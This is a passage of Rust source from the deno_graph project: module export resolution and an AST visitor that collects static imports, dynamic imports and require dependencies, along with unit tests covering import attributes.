  // cycle guard: each module contributes its exports only once
  if !visited.insert(module.specifier()) {
    return ModuleExports::default();
  }
  let mut unresolved_specifiers = Vec::new();
  let mut resolved = IndexMap::new();
  // the module's own exports always win over re-exported names
  for (name, symbol_id) in module.module_symbol().exports() {
    resolved.insert(
      name.clone(),
      ResolvedExportOrReExportAllPath::Export(ResolvedExport {
        module,
        symbol_id: *symbol_id,
      }),
    );
  }
  if let Some(re_export_all_specifier) = module.re_export_all_specifiers() {
    let referrer_module = module;
    for re_export_specifier in re_export_all_specifier {
      let maybe_specifier = module_graph.resolve_dependency(
        re_export_specifier,
        module.specifier(),
        /* prefer_types */ true,
      );
      let maybe_module = maybe_specifier.and_then(specifier_to_module);
      if let Some(module) = maybe_module {
        let inner = exports_and_re_exports_inner(
          module_graph,
          module,
          specifier_to_module,
          visited,
        );
        for (name, item) in inner.resolved {
          // `export *` never re-exports "default", and names already
          // resolved (locally or by an earlier specifier) win
          if name != "default" && !resolved.contains_key(&name) {
            resolved.insert(
              name,
              ResolvedExportOrReExportAllPath::ReExportAllPath(
                ResolvedReExportAllPath {
                  referrer_module,
                  specifier: re_export_specifier,
                  next: Box::new(item),
                },
              ),
            );
          }
        }
        unresolved_specifiers.extend(inner.unresolved_specifiers);
      } else {
        // remember specifiers that didn't resolve so callers can surface them
        unresolved_specifiers.push(UnresolvedSpecifier {
          referrer: module,
          specifier: re_export_specifier,
        });
      }
    }
  }
  ModuleExports {
    resolved,
    unresolved_specifiers,
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/ast/dep.rs | src/ast/dep.rs | use std::collections::HashMap;
use deno_ast::MultiThreadedComments;
use deno_ast::ProgramRef;
use deno_ast::SourcePos;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::swc::ast;
use deno_ast::swc::ast::Callee;
use deno_ast::swc::ast::Expr;
use deno_ast::swc::ast::ImportPhase;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::common::comments::CommentKind;
use deno_ast::swc::ecma_visit::Visit;
use deno_ast::swc::ecma_visit::VisitWith;
use crate::analysis::DynamicDependencyKind;
use crate::analysis::ImportAttribute;
use crate::analysis::ImportAttributes;
use crate::analysis::StaticDependencyKind;
/// Walks a parsed program and collects all of its static and dynamic
/// dependency descriptors.
pub fn analyze_program_dependencies(
  program: ProgramRef,
  comments: &MultiThreadedComments,
) -> Vec<DependencyDescriptor> {
  let mut collector = DependencyCollector {
    comments,
    items: Vec::new(),
  };
  match program {
    ProgramRef::Module(module) => module.visit_with(&mut collector),
    ProgramRef::Script(script) => script.visit_with(&mut collector),
  }
  collector.items
}
/// A comment attached to a dependency.
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct DependencyComment {
  /// Line or block comment.
  pub kind: CommentKind,
  /// Source range of the comment.
  pub range: SourceRange,
  /// The comment's text.
  pub text: Atom,
}
/// A static or dynamic dependency found while analyzing a module.
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum DependencyDescriptor {
  Static(StaticDependencyDescriptor),
  Dynamic(DynamicDependencyDescriptor),
}
/// A statically analyzable import/export dependency.
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct StaticDependencyDescriptor {
  /// The kind of static dependency (import/export, code or types).
  pub kind: StaticDependencyKind,
  /// Any leading comments associated with the dependency. This is used for
  /// further processing of supported pragma that impact the dependency.
  pub leading_comments: Vec<DependencyComment>,
  /// The range of the import/export statement.
  pub range: SourceRange,
  /// The text specifier associated with the import/export statement.
  pub specifier: Atom,
  /// The range of the specifier.
  pub specifier_range: SourceRange,
  /// Import attributes for this dependency.
  pub import_attributes: ImportAttributes,
  /// If this is an import for side effects only (ex. `import './load.js';`)
  pub is_side_effect: bool,
}
impl From<StaticDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: StaticDependencyDescriptor) -> Self {
DependencyDescriptor::Static(descriptor)
}
}
/// A dynamic dependency (ex. `import("...")`).
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct DynamicDependencyDescriptor {
  /// Kind of dynamic dependency.
  pub kind: DynamicDependencyKind,
  /// Any leading comments associated with the dependency. This is used for
  /// further processing of supported pragma that impact the dependency.
  pub leading_comments: Vec<DependencyComment>,
  /// The range of the import/export statement.
  pub range: SourceRange,
  /// The argument associated with the dynamic import
  pub argument: DynamicArgument,
  /// The range of the specifier.
  pub argument_range: SourceRange,
  /// Import attributes for this dependency.
  pub import_attributes: ImportAttributes,
}
impl From<DynamicDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: DynamicDependencyDescriptor) -> Self {
DependencyDescriptor::Dynamic(descriptor)
}
}
/// The argument to a dynamic import, as far as it could be statically
/// analyzed.
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum DynamicArgument {
  /// A string literal argument.
  String(Atom),
  /// A template literal argument, decomposed into its parts.
  Template(Vec<DynamicTemplatePart>),
  /// An expression that could not be analyzed.
  Expr,
}
/// One piece of a template-literal dynamic import argument.
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum DynamicTemplatePart {
  /// A static string portion of the template.
  String(Atom),
  /// An expression that could not be analyzed.
  Expr,
}
/// Visitor that accumulates dependency descriptors while walking a
/// program.
struct DependencyCollector<'a> {
  /// Comments of the parsed source, used to capture leading comments.
  comments: &'a MultiThreadedComments,
  /// The collected descriptors, in visit order.
  pub items: Vec<DependencyDescriptor>,
}
impl DependencyCollector<'_> {
  /// Returns the comments immediately preceding `start`, or an empty
  /// vec when there are none.
  fn get_leading_comments(&self, start: SourcePos) -> Vec<DependencyComment> {
    match self.comments.get_leading(start) {
      Some(leading) => leading
        .iter()
        .map(|c| DependencyComment {
          kind: c.kind,
          range: c.range(),
          text: c.text.clone(),
        })
        .collect(),
      None => Vec::new(),
    }
  }
  /// Returns `true` when the callee looks like a CommonJS `require` call.
  fn is_require(&self, callee: &Callee) -> bool {
    match callee {
      Callee::Expr(expr) => match &**expr {
        // assume any ident named `require` is a require call
        // even if it's not using the global or the result of
        // calling `createRequire`.
        Expr::Ident(ident) => ident.sym == "require",
        _ => false,
      },
      _ => false,
    }
  }
}
impl Visit for DependencyCollector<'_> {
  /// Collects static `import` declarations, classifying type-only imports
  /// and import phases. Deferred (`import defer`) imports are skipped.
  fn visit_import_decl(&mut self, node: &ast::ImportDecl) {
    let leading_comments = self.get_leading_comments(node.start());
    let kind = match (node.type_only, node.phase) {
      (true, _) => StaticDependencyKind::ImportType,
      (false, ImportPhase::Evaluation) => StaticDependencyKind::Import,
      (false, ImportPhase::Source) => StaticDependencyKind::ImportSource,
      (false, ImportPhase::Defer) => return,
    };
    self.items.push(
      StaticDependencyDescriptor {
        kind,
        leading_comments,
        range: node.range(),
        specifier: node.src.value.to_atom_lossy().into_owned(),
        specifier_range: node.src.range(),
        import_attributes: parse_import_attributes(node.with.as_deref()),
        // no import specifiers (`import "./mod.ts"`) means a
        // side-effect-only import
        is_side_effect: node.specifiers.is_empty(),
      }
      .into(),
    );
  }
  /// Collects `export { ... } from "..."` declarations; named exports
  /// without a source are not dependencies.
  fn visit_named_export(&mut self, node: &ast::NamedExport) {
    let Some(src) = &node.src else {
      return;
    };
    let leading_comments = self.get_leading_comments(node.start());
    let kind = if node.type_only {
      StaticDependencyKind::ExportType
    } else {
      StaticDependencyKind::Export
    };
    self.items.push(
      StaticDependencyDescriptor {
        kind,
        leading_comments,
        range: node.range(),
        specifier: src.value.to_atom_lossy().into_owned(),
        specifier_range: src.range(),
        import_attributes: parse_import_attributes(node.with.as_deref()),
        is_side_effect: false,
      }
      .into(),
    );
  }
  /// Collects `export * from "..."` declarations.
  fn visit_export_all(&mut self, node: &ast::ExportAll) {
    let leading_comments = self.get_leading_comments(node.start());
    let kind = if node.type_only {
      StaticDependencyKind::ExportType
    } else {
      StaticDependencyKind::Export
    };
    self.items.push(
      StaticDependencyDescriptor {
        kind,
        leading_comments,
        range: node.range(),
        specifier: node.src.value.to_atom_lossy().into_owned(),
        specifier_range: node.src.range(),
        import_attributes: parse_import_attributes(node.with.as_deref()),
        is_side_effect: false,
      }
      .into(),
    );
  }
  /// Collects TypeScript `import("...")` type references
  /// (e.g. `type A = import("./mod.ts").A`).
  fn visit_ts_import_type(&mut self, node: &ast::TsImportType) {
    let leading_comments = self.get_leading_comments(node.start());
    self.items.push(
      StaticDependencyDescriptor {
        kind: StaticDependencyKind::ImportType,
        leading_comments,
        range: node.range(),
        specifier: node.arg.value.to_atom_lossy().into_owned(),
        specifier_range: node.arg.range(),
        import_attributes: node
          .attributes
          .as_ref()
          .map(|a| parse_import_attributes_from_object_lit(&a.with))
          .unwrap_or_default(),
        is_side_effect: false,
      }
      .into(),
    );
    // keep walking — import types may be nested in other type positions
    node.visit_children_with(self);
  }
  fn visit_module_items(&mut self, items: &[ast::ModuleItem]) {
    items.visit_children_with(self);
  }
  fn visit_stmts(&mut self, items: &[ast::Stmt]) {
    items.visit_children_with(self)
  }
  /// Collects dynamic `import(...)` and `require(...)` calls, analyzing
  /// string literals, template literals, and `+` concatenations in the
  /// first argument as far as statically possible.
  fn visit_call_expr(&mut self, node: &ast::CallExpr) {
    node.visit_children_with(self);
    let kind = match &node.callee {
      Callee::Import(import) => match import.phase {
        ImportPhase::Evaluation => DynamicDependencyKind::Import,
        ImportPhase::Source => DynamicDependencyKind::ImportSource,
        ImportPhase::Defer => return,
      },
      _ if self.is_require(&node.callee) => DynamicDependencyKind::Require,
      _ => return,
    };
    // no argument — nothing to record
    let Some(arg) = node.args.first() else {
      return;
    };
    let argument = match &*arg.expr {
      Expr::Lit(ast::Lit::Str(specifier)) => {
        DynamicArgument::String(specifier.value.to_atom_lossy().into_owned())
      }
      Expr::Tpl(tpl) => {
        if tpl.quasis.len() == 1 && tpl.exprs.is_empty() {
          // a template with no substitutions is equivalent to a string
          DynamicArgument::String(
            tpl.quasis[0]
              .cooked
              .as_ref()
              .unwrap()
              .to_atom_lossy()
              .into_owned(),
          )
        } else {
          // quasis and exprs alternate: quasi, expr, quasi, ..., quasi
          let mut parts =
            Vec::with_capacity(tpl.quasis.len() + tpl.exprs.len());
          for i in 0..tpl.quasis.len() {
            let cooked = tpl.quasis[i].cooked.as_ref().unwrap();
            if !cooked.is_empty() {
              parts.push(DynamicTemplatePart::String(
                cooked.to_atom_lossy().into_owned(),
              ));
            }
            if tpl.exprs.get(i).is_some() {
              parts.push(DynamicTemplatePart::Expr);
            }
          }
          DynamicArgument::Template(parts)
        }
      }
      Expr::Bin(bin) => {
        let mut parts = Vec::with_capacity(2);
        // Flattens a left-leaning `+` concatenation tree into parts.
        // Errs when an operator isn't `+` or when the leftmost operand
        // isn't a string literal (nothing useful can be inferred then).
        fn visit_bin(
          parts: &mut Vec<DynamicTemplatePart>,
          bin: &ast::BinExpr,
        ) -> Result<(), ()> {
          if bin.op != ast::BinaryOp::Add {
            return Err(());
          }
          match &*bin.left {
            Expr::Bin(left) => {
              visit_bin(parts, left)?;
            }
            Expr::Lit(ast::Lit::Str(str)) => {
              parts.push(DynamicTemplatePart::String(
                str.value.to_atom_lossy().into_owned(),
              ));
            }
            _ => {
              if parts.is_empty() {
                return Err(());
              }
              parts.push(DynamicTemplatePart::Expr);
            }
          };
          if let Expr::Lit(ast::Lit::Str(str)) = &*bin.right {
            parts.push(DynamicTemplatePart::String(
              str.value.to_atom_lossy().into_owned(),
            ));
          } else {
            parts.push(DynamicTemplatePart::Expr);
          }
          Ok(())
        }
        if visit_bin(&mut parts, bin).is_ok() {
          DynamicArgument::Template(parts)
        } else {
          DynamicArgument::Expr
        }
      }
      _ => DynamicArgument::Expr,
    };
    let dynamic_import_attributes =
      parse_dynamic_import_attributes(node.args.get(1));
    let leading_comments = self.get_leading_comments(node.start());
    self.items.push(
      DynamicDependencyDescriptor {
        kind,
        leading_comments,
        range: node.range(),
        argument,
        argument_range: arg.range(),
        import_attributes: dynamic_import_attributes,
      }
      .into(),
    );
  }
  /// Collects `import foo = require("...")` and
  /// `export import foo = require("...")` declarations.
  fn visit_ts_import_equals_decl(&mut self, node: &ast::TsImportEqualsDecl) {
    use ast::TsModuleRef;
    if let TsModuleRef::TsExternalModuleRef(module) = &node.module_ref {
      let leading_comments = self.get_leading_comments(node.start());
      let expr = &module.expr;
      let kind = if node.is_type_only {
        StaticDependencyKind::ImportType
      } else if node.is_export {
        StaticDependencyKind::ExportEquals
      } else {
        StaticDependencyKind::ImportEquals
      };
      self.items.push(
        StaticDependencyDescriptor {
          kind,
          leading_comments,
          range: node.range(),
          specifier: expr.value.to_atom_lossy().into_owned(),
          specifier_range: expr.range(),
          import_attributes: Default::default(),
          is_side_effect: false,
        }
        .into(),
      );
    }
  }
  /// Collects `declare module "..."` declarations that look like module
  /// augmentations: relative/absolute specifiers or any specifier without
  /// a wildcard.
  fn visit_ts_module_decl(&mut self, node: &ast::TsModuleDecl) {
    if let Some(id_str) = node.id.as_str() {
      let value_str = id_str.value.to_string_lossy();
      if !value_str.contains('*')
        || value_str.starts_with("./")
        || value_str.starts_with("../")
        || value_str.starts_with('/')
      {
        let leading_comments = self.get_leading_comments(node.start());
        self.items.push(
          StaticDependencyDescriptor {
            kind: StaticDependencyKind::MaybeTsModuleAugmentation,
            leading_comments,
            range: id_str.range(),
            specifier: id_str.value.to_atom_lossy().into_owned(),
            specifier_range: id_str.range(),
            import_attributes: Default::default(),
            is_side_effect: false,
          }
          .into(),
        );
      }
    }
    node.visit_children_with(self);
  }
}
/// Parses import attributes into a hashmap. According to proposal the values
/// can only be strings (https://github.com/tc39/proposal-import-attributes#should-more-than-just-strings-be-supported-as-attribute-values)
/// and thus non-string values are skipped.
fn parse_import_attributes(
maybe_attrs: Option<&ast::ObjectLit>,
) -> ImportAttributes {
let Some(attrs) = maybe_attrs else {
return ImportAttributes::None;
};
let mut import_attributes = HashMap::new();
for prop in attrs.props.iter() {
if let ast::PropOrSpread::Prop(prop) = prop
&& let ast::Prop::KeyValue(key_value) = &**prop
{
let maybe_key = match &key_value.key {
ast::PropName::Str(key) => key.value.as_atom(),
ast::PropName::Ident(ident) => Some(&ident.sym),
_ => None,
};
if let Some(key) = maybe_key
&& let ast::Expr::Lit(ast::Lit::Str(str_)) = &*key_value.value
&& let Some(value_str) = str_.value.as_str()
{
import_attributes.insert(
key.to_string(),
ImportAttribute::Known(value_str.to_string()),
);
}
}
}
ImportAttributes::Known(import_attributes)
}
/// Parses import attributes from the second arg of a dynamic import.
fn parse_dynamic_import_attributes(
  arg: Option<&ast::ExprOrSpread>,
) -> ImportAttributes {
  let arg = match arg {
    Some(arg) => arg,
    None => return ImportAttributes::None,
  };
  // a spread second argument cannot be analyzed
  if arg.spread.is_some() {
    return ImportAttributes::Unknown;
  }
  let object_lit = match &*arg.expr {
    ast::Expr::Object(object_lit) => object_lit,
    _ => return ImportAttributes::Unknown,
  };
  let mut attributes_map = HashMap::new();
  // whether a "with"/"assert" key was seen at all
  let mut had_attributes_key = false;
  // whether specifically a "with" key was seen (takes precedence)
  let mut had_with_key = false;
  for prop in object_lit.props.iter() {
    let prop = match prop {
      ast::PropOrSpread::Prop(prop) => prop,
      _ => return ImportAttributes::Unknown,
    };
    let key_value = match &**prop {
      ast::Prop::KeyValue(key_value) => key_value,
      _ => return ImportAttributes::Unknown,
    };
    let key = match &key_value.key {
      ast::PropName::Str(key) => match key.value.as_atom() {
        Some(key) => key,
        None => return ImportAttributes::Unknown,
      },
      ast::PropName::Ident(ident) => &ident.sym,
      _ => return ImportAttributes::Unknown,
    };
    // NOTE: precedence makes this parse as
    // `key == "with" || (key == "assert" && !had_with_key)`, so a "with"
    // key is always processed and wins over a legacy "assert" key
    // regardless of property order.
    if key == "with" || key == "assert" && !had_with_key {
      had_attributes_key = true;
      had_with_key = key == "with";
      let attributes_lit = match &*key_value.value {
        ast::Expr::Object(lit) => lit,
        _ => return ImportAttributes::Unknown,
      };
      match parse_import_attributes_from_object_lit(attributes_lit) {
        ImportAttributes::Known(hash_map) => {
          attributes_map = hash_map;
        }
        // propagate non-Known results (e.g. Unknown) as-is
        value => return value,
      }
    }
  }
  if had_attributes_key {
    ImportAttributes::Known(attributes_map)
  } else {
    ImportAttributes::None
  }
}
/// Converts an object literal of attributes into an attribute map. Every
/// non-key-value or computed shape makes the whole result `Unknown`;
/// individual non-string values become `ImportAttribute::Unknown`.
fn parse_import_attributes_from_object_lit(
  attributes_lit: &ast::ObjectLit,
) -> ImportAttributes {
  let mut attributes_map = HashMap::with_capacity(attributes_lit.props.len());
  for prop in attributes_lit.props.iter() {
    let ast::PropOrSpread::Prop(prop) = prop else {
      return ImportAttributes::Unknown;
    };
    let ast::Prop::KeyValue(key_value) = &**prop else {
      return ImportAttributes::Unknown;
    };
    let key = match &key_value.key {
      ast::PropName::Str(key) => match key.value.as_atom() {
        Some(key) => key,
        None => return ImportAttributes::Unknown,
      },
      ast::PropName::Ident(ident) => &ident.sym,
      _ => return ImportAttributes::Unknown,
    };
    // only a string literal value with valid text is "known"
    let value = match &*key_value.value {
      ast::Expr::Lit(ast::Lit::Str(str_)) => match str_.value.as_str() {
        Some(text) => ImportAttribute::Known(text.to_string()),
        None => ImportAttribute::Unknown,
      },
      _ => ImportAttribute::Unknown,
    };
    attributes_map.insert(key.to_string(), value);
  }
  ImportAttributes::Known(attributes_map)
}
#[cfg(test)]
mod tests {
use crate::ModuleSpecifier;
use deno_ast::SourcePos;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::common::comments::CommentKind;
use pretty_assertions::assert_eq;
use super::*;
  /// Parses `source` as TSX under the given `specifier` and returns the
  /// program start position along with the analyzed dependencies.
  fn helper(
    specifier: &str,
    source: &str,
  ) -> (SourcePos, Vec<DependencyDescriptor>) {
    let source = deno_ast::parse_module(deno_ast::ParseParams {
      specifier: ModuleSpecifier::parse(specifier).unwrap(),
      text: source.into(),
      media_type: crate::MediaType::Tsx,
      capture_tokens: false,
      scope_analysis: false,
      maybe_syntax: None,
    })
    .unwrap();
    (
      source.program_ref().start(),
      analyze_program_dependencies(source.program_ref(), source.comments()),
    )
  }
#[test]
fn test_parsed_module_get_dependencies() {
let source = r#"import * as bar from "./test.ts";
/** JSDoc */
import type { Foo } from "./foo.d.ts";
/// <reference foo="bar" />
export * as Buzz from "./buzz.ts";
// @some-pragma
/**
* Foo
*/
export type { Fizz } from "./fizz.d.ts";
const { join } = require("path");
// dynamic
await import("./foo1.ts");
try {
const foo = await import("./foo.ts");
} catch (e) {
// pass
}
try {
const foo = require("some_package");
} catch (e) {
// pass
}
import foo2 = require("some_package_foo");
import type FooType = require('some_package_foo_type');
export import bar2 = require("some_package_bar");
const foo3 = require.resolve("some_package_resolve");
try {
const foo4 = require.resolve("some_package_resolve_foo");
} catch (e) {
// pass
}
"#;
let (start_pos, dependencies) = helper("file:///test.ts", source);
assert_eq!(
dependencies,
vec![
StaticDependencyDescriptor {
kind: StaticDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos, start_pos + 33),
specifier: Atom::from("./test.ts"),
specifier_range: SourceRange::new(start_pos + 21, start_pos + 32),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportType,
leading_comments: vec![DependencyComment {
kind: CommentKind::Block,
text: r#"* JSDoc "#.into(),
range: SourceRange::new(start_pos + 34, start_pos + 46),
}],
range: SourceRange::new(start_pos + 47, start_pos + 85),
specifier: Atom::from("./foo.d.ts"),
specifier_range: SourceRange::new(start_pos + 72, start_pos + 84),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Export,
leading_comments: vec![DependencyComment {
kind: CommentKind::Line,
text: r#"/ <reference foo="bar" />"#.into(),
range: SourceRange::new(start_pos + 86, start_pos + 113),
}],
range: SourceRange::new(start_pos + 114, start_pos + 148),
specifier: Atom::from("./buzz.ts"),
specifier_range: SourceRange::new(start_pos + 136, start_pos + 147),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportType,
leading_comments: vec![
DependencyComment {
kind: CommentKind::Line,
text: r#" @some-pragma"#.into(),
range: SourceRange::new(start_pos + 149, start_pos + 164),
},
DependencyComment {
kind: CommentKind::Block,
text: "*\n * Foo\n ".into(),
range: SourceRange::new(start_pos + 165, start_pos + 179),
}
],
range: SourceRange::new(start_pos + 180, start_pos + 220),
specifier: Atom::from("./fizz.d.ts"),
specifier_range: SourceRange::new(start_pos + 206, start_pos + 219),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
DynamicDependencyDescriptor {
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 238, start_pos + 253),
argument: DynamicArgument::String(Atom::from("path")),
argument_range: SourceRange::new(start_pos + 246, start_pos + 252),
import_attributes: Default::default(),
kind: DynamicDependencyKind::Require,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 272, start_pos + 291),
argument: DynamicArgument::String(Atom::from("./foo1.ts")),
argument_range: SourceRange::new(start_pos + 279, start_pos + 290),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 321, start_pos + 339),
argument: DynamicArgument::String(Atom::from("./foo.ts")),
argument_range: SourceRange::new(start_pos + 328, start_pos + 338),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Require,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 391, start_pos + 414),
argument: DynamicArgument::String(Atom::from("some_package")),
argument_range: SourceRange::new(start_pos + 399, start_pos + 413),
import_attributes: Default::default(),
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportEquals,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 444, start_pos + 486),
specifier: Atom::from("some_package_foo"),
specifier_range: SourceRange::new(start_pos + 466, start_pos + 484),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportType,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 487, start_pos + 542),
specifier: Atom::from("some_package_foo_type"),
specifier_range: SourceRange::new(start_pos + 517, start_pos + 540),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportEquals,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 543, start_pos + 592),
specifier: Atom::from("some_package_bar"),
specifier_range: SourceRange::new(start_pos + 572, start_pos + 590),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
]
);
}
#[test]
fn test_import_attributes() {
let source = r#"import * as bar from "./test.ts" with { "type": "typescript" };
export * from "./test.ts" with { "type": "typescript" };
export { bar } from "./test.json" with { "type": "json" };
import foo from "./foo.json" with { type: "json" };
const fizz = await import("./fizz.json", { "with": { type: "json" } });
const buzz = await import("./buzz.json", { with: { "type": "json" } });
const d1 = await import("./d1.json");
const d2 = await import("./d2.json", {});
const d3 = await import("./d3.json", bar);
const d4 = await import("./d4.json", { with: {} });
const d5 = await import("./d5.json", { with: bar });
const d6 = await import("./d6.json", { with: {}, ...bar });
const d7 = await import("./d7.json", { with: {}, ["assert"]: "bad" });
const d8 = await import("./d8.json", { with: { type: bar } });
const d9 = await import("./d9.json", { with: { type: "json", ...bar } });
const d10 = await import("./d10.json", { with: { type: "json", ["type"]: "bad" } });
"#;
let (start_pos, dependencies) = helper("file:///test.ts", source);
let expected_attributes1 = ImportAttributes::Known({
let mut map = HashMap::new();
map.insert(
"type".to_string(),
ImportAttribute::Known("typescript".to_string()),
);
map
});
let expected_attributes2 = ImportAttributes::Known({
let mut map = HashMap::new();
map.insert(
"type".to_string(),
ImportAttribute::Known("json".to_string()),
);
map
});
let dynamic_expected_attributes2 = ImportAttributes::Known({
let mut map = HashMap::new();
map.insert(
"type".to_string(),
ImportAttribute::Known("json".to_string()),
);
map
});
assert_eq!(
dependencies,
vec![
StaticDependencyDescriptor {
kind: StaticDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos, start_pos + 63),
specifier: Atom::from("./test.ts"),
specifier_range: SourceRange::new(start_pos + 21, start_pos + 32),
import_attributes: expected_attributes1.clone(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Export,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 64, start_pos + 120),
specifier: Atom::from("./test.ts"),
specifier_range: SourceRange::new(start_pos + 78, start_pos + 89),
import_attributes: expected_attributes1,
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Export,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 121, start_pos + 179),
specifier: Atom::from("./test.json"),
specifier_range: SourceRange::new(start_pos + 141, start_pos + 154),
import_attributes: expected_attributes2.clone(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 180, start_pos + 231),
specifier: Atom::from("./foo.json"),
specifier_range: SourceRange::new(start_pos + 196, start_pos + 208),
import_attributes: expected_attributes2,
is_side_effect: false,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 251, start_pos + 302),
argument: DynamicArgument::String(Atom::from("./fizz.json")),
argument_range: SourceRange::new(start_pos + 258, start_pos + 271),
import_attributes: dynamic_expected_attributes2.clone(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 323, start_pos + 374),
argument: DynamicArgument::String(Atom::from("./buzz.json")),
argument_range: SourceRange::new(start_pos + 330, start_pos + 343),
import_attributes: dynamic_expected_attributes2,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 393, start_pos + 412),
argument: DynamicArgument::String(Atom::from("./d1.json")),
argument_range: SourceRange::new(start_pos + 400, start_pos + 411),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 431, start_pos + 454),
argument: DynamicArgument::String(Atom::from("./d2.json")),
argument_range: SourceRange::new(start_pos + 438, start_pos + 449),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 473, start_pos + 497),
argument: DynamicArgument::String(Atom::from("./d3.json")),
argument_range: SourceRange::new(start_pos + 480, start_pos + 491),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 516, start_pos + 549),
argument: DynamicArgument::String(Atom::from("./d4.json")),
argument_range: SourceRange::new(start_pos + 523, start_pos + 534),
import_attributes: ImportAttributes::Known(HashMap::new()),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 568, start_pos + 602),
argument: DynamicArgument::String(Atom::from("./d5.json")),
argument_range: SourceRange::new(start_pos + 575, start_pos + 586),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 621, start_pos + 662),
argument: DynamicArgument::String(Atom::from("./d6.json")),
argument_range: SourceRange::new(start_pos + 628, start_pos + 639),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 681, start_pos + 733),
argument: DynamicArgument::String(Atom::from("./d7.json")),
argument_range: SourceRange::new(start_pos + 688, start_pos + 699),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 752, start_pos + 796),
argument: DynamicArgument::String(Atom::from("./d8.json")),
argument_range: SourceRange::new(start_pos + 759, start_pos + 770),
import_attributes: ImportAttributes::Known({
let mut map = HashMap::new();
map.insert("type".to_string(), ImportAttribute::Unknown);
map
}),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 815, start_pos + 870),
argument: DynamicArgument::String(Atom::from("./d9.json")),
argument_range: SourceRange::new(start_pos + 822, start_pos + 833),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 890, start_pos + 955),
argument: DynamicArgument::String(Atom::from("./d10.json")),
argument_range: SourceRange::new(start_pos + 897, start_pos + 909),
import_attributes: ImportAttributes::Unknown,
}
.into(),
]
);
}
#[test]
fn test_dynamic_imports() {
let source = r#"const d1 = await import(`./d1.json`);
const d2 = await import(`${value}`);
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
